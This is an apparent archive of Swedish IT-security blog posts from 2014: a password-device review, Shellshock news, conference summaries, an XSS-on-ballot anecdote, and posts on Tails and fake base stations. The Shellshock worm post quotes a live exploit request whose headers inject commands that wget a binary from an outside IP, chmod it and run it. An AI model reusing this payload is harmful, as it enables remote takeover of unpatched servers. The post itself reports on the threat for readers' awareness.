Säker lösenordshantering med Seclave

Vi fick för några månader sedan erhålla ett exemplar av lösenordshanteraren Seclave. Det är en liten enhet som har ett enda syfte: Hålla koll på dina lösenord. Dosan är max några centimeter stor och får plats i fickan. Den kan hålla upp till 500 stycken lösenord och skyddas av ett huvudlösenord som skapas när du startar upp enheten första gången.

Detta huvudlösenord består av två ord som är lätta att komma ihåg men svåra att forcera genom det lilla kontrolldonet på Seclave-enheten. Det finns även en begränsning på hur många försök som får genomföras innan allt innehåll raderas.

För den som är mer intresserad av tekniska detaljer så rekommenderar vi att läsa här. Utöver att spara lösenord så ingår det även en lösenordsgenerator som kan skapa nya säkra svårgissade lösenord.

Det vi gillar extra mycket är att den ej behöver någon anslutning till din dator och du kan hålla den fysiskt separerad från övrig utrustning. Men om du vill ansluta den till din dator så finns även den möjligheten och då kan du ta backup av lösenorden samt så agerar enheten tangentbord och kan då skriva in lösenord.

Seclave kostar cirka 600kr och är byggd i Sverige samt utvecklad av Karl Janmar af Ekenstam.

Seclave1

Seclave2

Shellshock nu som mask

För några minuter sedan observerades den första masken baserad på bash-buggen Shellshock. Detaljer från Github gist enligt följande:

GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

$ file nginx 
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

$ md5sum nginx 
5924bcc045bb7039f55c6ce29234e29a  nginx

$ sha256sum nginx 
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489  nginx

Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys

Shellshock – Ny sårbarhet allvarligare än Heartbleed

Uppdatering: Nu finns det rapporterat om en mask som sprids.

Det har rapporterats om en uppdagad säkerhetsbrist i kommandotolken bash som funnits där i 22 år. Denna sårbarhet är lätt att utnyttja fjärrmässigt och påverkar många applikationer. Eftersom att den är så lätt att utnyttja och ger allvarliga konsekvenser såsom RCE (remote code execution) så klassas den som allvarligare än Heartbleed.

Buggen har fått namnet Shellshock (av Adde) och beror på hur bash hanterar miljövariablar som gör att exekverbar kod kan inbakas exempelvis på följande sätt:

bash bugg

Det är ännu oklart hur stor omfattningen är men buggen i sin natur gör att exekverbar kod kan bakas in i olika http-huvuden såsom referer, host och cookie.

Applikationer såsom cPanel har rapporterats som sårbara men även PHP-program som använder sig av system(), passthru(), shell_exec() och liknande kan vara sårbara. Även webbappar som innehar filändelser såsom .cgi är mycket troliga kandidater då detta mycket troligtvis är shellscript som exekveras direkt. Men även shellscript som exekveras indirekt kan vara sårbara.

Även så finns det möjlighet att denna bugg kan bli en mask då den är lätt att automatiskt utnyttja. Detectify meddelade att de har lagt in stöd för att söka efter denna bugg i sitt verktyg.

Sårbarheten påverkar mer än bara webbappar, alla sätt där användare på något sätt lokalt eller fjärrmässigt kan påverka miljövariablar innebär eventuell kodexekering såsom dhcp.

Läs även vad RedHat skrivit om buggen och det blev inte heller bättre av att fixen som släpptes ej åtgärdade problemet.

Och det finns redan kod ute för att skapa ett skal som ringer hem (connect back):

shellshock

 

Uppdatering: Verkar som att en mask redan är ute och sprids:

https://gist.github.com/anonymous/929d622f3b36b00c0be1

$ md5sum nginx 
5924bcc045bb7039f55c6ce29234e29a nginx
 
$ sha256sum nginx 
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

Eftermiddagen Next Generation Threats 2014

Detta är del två av vår sammanfattning av konferensen Next Generation Threats som anordnas av IDG TechWorld. Del ett kan du läsa här.

Marion Marschalek, How would you find what you can’t see?

Börjar med att berätta om malware-historia och olika typer av malware såsom trojaner, virus, maskar etc. Sedan om historien för att upptäcka malware genom exempelvis checksummor. Efter ett tag så lämnade man checksummor och gick över till signaturer som identifierade delar av filer och nu används en mängd olika metoder såsom vitlistning, heuristik, beteenden och information från molnet.

Endpoint-säkerhet i antivirus-produkter blir allt bättre och kontrollerar USB-minnen, URL:er och E-post exempelvis. Klientsystem blir uppkopplade och kontrollerar information i realtid mot molnet.

Marion berättar att Zeus är hennes favorit inom skadlig kod ”old but gold”. Hon berättar att antivirus har en detection-rate på cirka 40% i dagsläget vilket är lågt.

Det finns ingen universiell lösning utan det är flertalet saker som måste tänkas på. Minimalistiska system, håll koll på loggar och anslut inte överallt på internet.
Håll koll på alla anslutningar i ditt nätverk. Att antivirus skulle vara dött tycker Marion inte stämmer.

Robin Blokker, VIP security, digital attacks and defenses

Berättar om att FRA jobbar med informationssäkerhet samt signalspaning. Robin jobbar på en avdelning som testar säkerheten i samhällskritiska system på uppdrag av myndigheter och statligt ägda bolag.

FRA försöker att göra säkerheten i Sverige bättre. Det är inte lätt men några små steg i taget så blir det bättre och bättre med åren. Om det är en sak som Robin
rekommenderar så är det att sätta på utlåsning av konton vid misslyckade lösenordsförsök.

Organiserad brottslighet står bakom det mesta dåliga som syns på internet såsom spam och liknande. Det FRA är oroliga över är dock statliga aktörer som är svårare att upptäcka.

Hur genomförs attackerna?

Genom exempelvis waterhole, återanvändning eller stöld av behörigheter. Spårning och identifiering av administratörer på nätverk. Skapa en fälla genom att exempelvis gå till en administratör med en trasig dator eller liknande och berätta att det ej går att logga in. Då försöker administratören logga in med admin-behörigheter som du kan spara undan.

FRA varnar för administratörer: Alla måste byta lösenord ofta utan admins.

Gränsen mellan företagets datorer och dina privata suddas ut.

Använd inte admin-konton överallt. Upprätta ett administratörnätverk där det finns klienter för administration och att enbart dessa används. Vore bra om alla använde biometri istället för lösenord eller 2FA men Robin är nöjd om användare börjar med passphrases istället för passwords.

Moxie Marlinspike, End to end encryption for everyone

Börjar med att berätta om amerikanska actionfilmer och att amerikanerna är underdogs i filmer såsom Rocky, Hunt for red october och Top Gun. Poängen verkar vara ”power vs people” där NSA är onda i exempelvis filmen Enemy of the state. Sen på 2000-talet så börjar det handla om terrorister och det blir mer åt ”vi mot dem” hållet igen.

Hackers DNA kommer från filmer och tittar vi på filmer som släppts nyligen så handlar det mycket om ”power vs people” samt så nämner han Hunger games.

När Moxie började utveckla mjukvara för säker kommunikation så tittade han på PGP vs. OTR. Svårt att använda kryptomjukvara såsom PGP där manualer är ofantligt stora
och krångliga för nybörjare.

Vi måste titta mot OTR men det blir problem såsom flertalet enheter samt extra handskakning. Sessioner är flera år långa och det ställer till problem.

Axolotl är ett nytt protokoll som dom har tagit fram som gör en trippel Diffie-Hellman. Det finns inga power-users, det är inte som PGP samt användaren behöver inte veta vad en nyckel är.

Allt som Open WhisperSystems utvecklar är öppen källkod.

Diskussioner om Truecrypt uppstår och Runa A Sandvik säger att projektet är temporärt dött, många i publiken verkar fortfarande använda det. Moxie vill rätta sig
angående att PGP är utdött och säger att det är bra för att skicka krypterade filer.

Åsa Schwarz, Into the future of IT security

Tid att upptäcka intrång i organisationer blir inte snabbare men tiden det tar att göra intrång går snabbare. Detta beror på att vi är människor och vi ser olika på
säkerhet. Exempelvis så ser en tekniker och en säljare olika på säkerhet.

Säkerhet måste finnas med i utvecklingsspåret samt risk managment. Användare är för snabba och företagen hänger inte riktigt med: nya appar och telefoner etc hela tiden.

Säkerhet måste även vara användarvänligt och stödja affären.

Förmiddagen IDG TechWorld NGT 2014

Här kommer en sammanställning av förmiddagen under IT-säkerhetskonferensen Next Generation Threats 2014 som anordnas av IDG TechWorld. Du kan läsa om eftermiddagen här.

Christopher Soghoian, Blinding The Surveillance State

Säkerhet i mobiltelefoner

Skillnaden i säkerhet mellan iOS och Android. Få slutanvändare som förstår skillnaden. Slutkonsumenterna står alltid inför ett val i butiken. Apple beskriver säkerheten i iOS mycket bra i diverse dokument som publicerats på dess webbsida.

Android krypterade ej som standard tidigare. Men detta har nu ändrats. Svårt att slå igång kryptering på Android samt tar det tid.

Få använder funktioner som inte är på som standard. Boken Nudge, the power of default settings. Patternlösenord visar på att diskkryptering i Android används (inte tillräckligt med entropi).

Apple hade möjligghet att dekryptera vissa delar från iPhones. Telefonen var tvungen att skickas till Apple för dekryptering.

Tim Cook gick nu ut med ett meddelande att Apple nu ej längre kan dekryptera innehållet i iPhones från och med iOS 8. Google svarar med att meddela att nästa version
av Android kommer att inneha diskkryptering som standard.

Tyvärr kommer människor att välja dåliga PIN-koder vilket krypteringen baseras på. Detta för att vi är bekväma och att ange en lång PIN-kod flera gånger om dagen är ingen som gör.

Oklart om Google Hangouts går att avlyssna. Bra med iMessage är att det är kryptering som standard. Flertalet myndigheter klagar på att det ej går att erhålla data från iMessage via Apple.

Hårddiskkryptering

Apple Mac OS X filevault skickar som standard backup-nyckel till Apple. Går att ställa in dock.

Microsoft säljer flertalet olika versioner av Windows och Bitlocker är inte med på många av dessa. Finns inget sätt i dagsläget att slå på kryptering av hårddisken utan att MS tar del av din nyckel. Windows 8.1 har nu ändrat detta och hd-kryptering följer med och kan aktiveras med viss hårdvara.

Han berättar även om Truecrypt och hur beroende vi är/var av TC för att kryptera hårddisken.

Ett problem som föreläsaren belyser är att rika får bättre säkerhet och kryptering. Det är inte alla som har råd att köpa en Mac eller iPhone. Den dator du köper för 1500kr har ingen säkerhet eller kryptering. Bra säkerhet har blivit en klassfråga.

Affärsmodellen för många företag förhindrar att kryptering används. Han tar upp som exempel med Gmail och att reklamen som visas måste söka igenom din E-post efter nyckelord.

Företag som tjänar pengar direkt på sina användare istället för data har lättare att använda kryptering som standard.

En fråga från publiken gällande fingeravtryck och vad föreläsaren tycker om det. Han tycker att det är en bra övervägning som Apple har genom att både ha möjlighet att ha ett jättelångt lösenord som du enbart använder när telefonen startar om men annars använder du fingeravtryck. Polisen kan tvinga dig dock att låsa upp telefonen med ett fingeravtryck (precis som med lösenord).

En fråga gällande bakdörrar som implementeras i mjukvara såsom Skype. Nämner även warrant canaries och hur det fungerer. Säkerhet är inte den främsta orsaken till att Skype används, det är att inneha möjlighet att prata med sina nära och kära utan att betala dyra pengar.

Runa A Sandvik, Privacy Snakeoil: secret systems, technobabble and unbreakable things

Berättar om att hon jobbar för freedom of the press samt hjälper nyhetsredaktioner och journalister. Berättar om Securedrop och att de hjälper exempelvis Tor och Wikileaks.

NSA-proof har blivit ett ord som numera är vanligt och beskriva system eller produkter.

Få vet dock vad det innebär bara att dom vill vara/ha det, troligtvis eftersom många inte är så tekniskt bevandrade.

Berättar om Secret, Wickr, Telegram, Whisper Systems samt andra mobilappar som ska tillhandahålla säker kommunikation. Hon berättar även om det språkbruk som används på tjänsternas webbsidor.

Att beskriva produkter med tekniska ord skrämmer eventuellt iväg användare så därför används ord såsom military grade encryption och NSA-proof. Christopher säger att troligtvis bedöms produkten utifrån hur webbsidan ser ut. Även när alla använder samma beskrivningar av sina produkter så är det svårt att veta om dom verkligen är säkra eller hur kryptonycklar hanteras. Vi behöver oberoende granskning som kan ge bedömningar om vilka produkter som är bra och vilka som är dåliga.

Det vore bra med ett poängsystem eller liknande för att gradera appar/produkter säger Christopher.

Morgan Marquis-Boire, Senior Researcher and Technical Advisor

Berättar att han jobbade på Google då nyheten att NSA avlyssnade dem dök upp. Går in på att det kostar att skydda sig mot angripare och vilken nivå ska man lägga sig på. Det handlar om att öka kostnaden för massövervakning genom att hela tiden höja ribban.

Hur ser aktörerna ut? Är det kinesiska APT 1 som Mandiant fick stora rubriker genom att upptäcka eller är det NSA som ingår i hotbilden? Andra statliga aktörer man bör akta sig för är exempelvis Ryssland, Israel och FVEY (five eyes).

Nämner även FinFisher och att det nu finns en marknad runt att sälja denna typ av mjukvara till stater. HackingTeam är ett företag som är baserat i Italien och att dom sålt till 36 olika länder.

Morgan berättar om företag som utför etisk hacking åt myndigheter och stater. Det ska kosta att använda exploits och zero-days för att lägga in bakdörrar (implants).

Det är billigare med CNE än med HUMINT, insider etc. Stor del av internets användare tittar på kattfilmer på Youtube och videoströmmen går i klartext vilket öppnar upp för att injicera skadlig kod riktad mot just videoströmmen.

Finns att köpa proxyservrar som är specialsydda för att infektera datorer i exempelvis diktaturer såsom turkmenistan eller bahrain.

Christopher berättar även under frågestunden att vi är dåliga på att bygga funktioner för lösenordsåterställning. Frågor som är publikt tillgängliga är inte bra att använda.

XSS försök i valet

Precis som vid förra valet så har någon försökt att via papper och penna genomföra en cross site scripting-attack (XSS). Den finurliga personen har hittat på ett parti som ser ut enligt följande:

XSS valet

Turligt nog så har valförrättare läst fel och vi klarar oss från att diverse sajter exekverar javascript-kod som visar ett popupfönster.

Relevant XKCD på ämnet little bobby tables:

XKCD Exploits of a Mom

Och här finns filen med alla handskrivna röster: www.val.se/val/val2014/handskrivna/handskrivna.skv

Hittar du något mer intressant i filen? Lämna gärna en kommentar.

Uppdatering: Läs även vad Jonas Elfström skrev om XSS vid förra valet 2010

Uppdatering 2: Värt att tillägga är även att än så länge är bara 20% av alla röster räknade. Kan dyka upp fler överraskningar.

Next Generation Threats 2014

IDG TechWorld anordnar en konferens vid namn Next Generation Threats 2014 som går av stapeln i Stockholm den 24:de September. Vi kommer att finnas på plats att live-bevaka eventet som har ett stort antal intressanta talare på listan såsom:

  • Moxie Marlinspike
  • Runa A. Sandvik
  • Morgan Marquis-Boire
  • Robin Blokker
  • Marion Marschalek
  • Christopher Soghoian
  • Åsa Schwarz

Lokalen är Rival på Mariatorget och inträdet ligger på 3 950 SEK. Det föredrag jag tror kommer att bli mest intressant är End to end encryption for everyone av Moxie Marlinspike. Moxie står bakom bl.a. WhisperSystems och har identifierat åtskilliga sårbarheter i bl.a. SSL/TLS-implementationer.

Mer information och registrering:

Tails 1.1.1 ute

Nu har version 1.1.1 av det säkra och anonyma live-operativsystemet Tails släppts. Tails har bl.a. finansiellt stöd från sverige genom myndigheten Sida.

Främst har ett antal säkerhetsbrister åtgärdats där den allvarligaste kan avanonymisera en användare av Tails genom att använda en brist i I2P.

Denna sårbarhet uppdagades av företaget Exodus Intel och beskrivs i detalj i blogginlägget Tails from the Cri2p:

Tails sårbarhet

Även så komprimeras livesystemet bättre (SquashFS) och brandväggsreglerna snävas ytterligare åt.

För samtliga ändringar se här: git-tails.immerda.ch/tails/plain/debian/changelog

Utbrett problem med falska basstationer

På senare tid så har det dykt upp ett antal olika säkra mobiltelefoner eller appar såsom RedPhone, Signal och BlackPhone.  En av dessa telefoner vid namn CryptoPhone 500 har stöd att identifiera falska basstationer (mobilmaster) och enbart under en månad i Juli 2014 så identifierades 17 stycken falska basstationer i USA.

Bild CC Montgomery County Planning CommissionDet rör sig troligtvis om såkallade IMSI-catcher där någon försöker avlyssna samtal eller göra man-i-mitten-attacker (MITM) mot mobiltelefoner för att exempelvis installera spionprogram.

En falsk basstation hittades på South Point Casino i Las Vegas. Och bara genom att köra från Florida till North Carolina så identifierades 8 stycken falska stationer:

As we drove by, the iPhone showed no difference whatsoever. The Samsung Galaxy S4, the call went from 4G to 3G and back to 4G. The CryptoPhone lit up like a Christmas tree.

Hur utbrett detta problem är i Sverige är ännu oklart men det förkommer troligtvis. Att köpa en kommersiell IMSI-catcher såsom VME Dominator kostar runt 60 000 SEK men går att bygga själv för runt 7000 SEK med hjälp av en USRP och OpenBTS.

Bild på hur CryptoPhone 500 rapporterar en falsk station:

unenc

Samt hur Baseband Firewall-funktionen ser ut vid falsk basstation:

ciphering1

Presentation från säkerhetskonferensen DEFCON om just detta ämne:

Källa

4SICS: Ny konferens om SCADA-säkerhet

4SICS är en ny svensk konferens om säkerhet i cyberfysiska system (SCADA). Konferensen går av stapeln 22-23 Oktober 2014 i Stockholm.

Arrangörer är Erik Johansson samt Robert Malmgren som är två av sveriges främsta experter på IT-säkerhet i cyberfysiska system. Lokalen är Skyddsrummet som ligger på Söder Mälarstrand.

4SICS riktar sig till dig som jobbar med IT-säkerhet inom el, vatten, kärnkraft, transport eller energi -sektorn.

Att säkerhet inom SCADA är hett på tapeten bekräftas bl.a. genom att CERT-SE samt norska NSM NorCERT nyligen gick med ett meddelande om att norska energi- och olje-bolag blivit utsatta för riktade attacker. Samt så har många fortfarande Stuxnet färskt i minnet vilket anses vara ett välutvecklat IT-vapen.

Talarlista:

  • Stefan Lüders (CH) – Head of IT security at CERN
  • Joel Langill (US)  – Industrial Cyber Security Expert
  • John Matherly (US)  – Internet cartographer
  • Ruben Santamarta (ES)  – Principal Security  Consultant at IOActive
  • Sergey Gordeychik (RU) – SCADA StrangeLove ICS  Security Research Team
  • Erik Hjelmvik (SE)  – Security researcher and developer
  • Vyacheslav Borilin (RU)  – Business Development Manager
  • Margrete Raaum (NO)  – Statnett Security Incident Response Energy sector
  • Samuel Linares (ES) – Director at Industrial Cybersecurity Center
  • Anders Rodrick (SE)  – Founder and Principal Consultant at ARICT AB
  • Fredrik Hesse (SE) – Software Security Architect at Svenska Spel AB

Priset för två dagars konferens är 12.000 SEK + skatt. Detta pris gäller om du är snabb och registrerar dig för earlybird-priset.

Det går även att följa 4SICS på Twitter: @4sics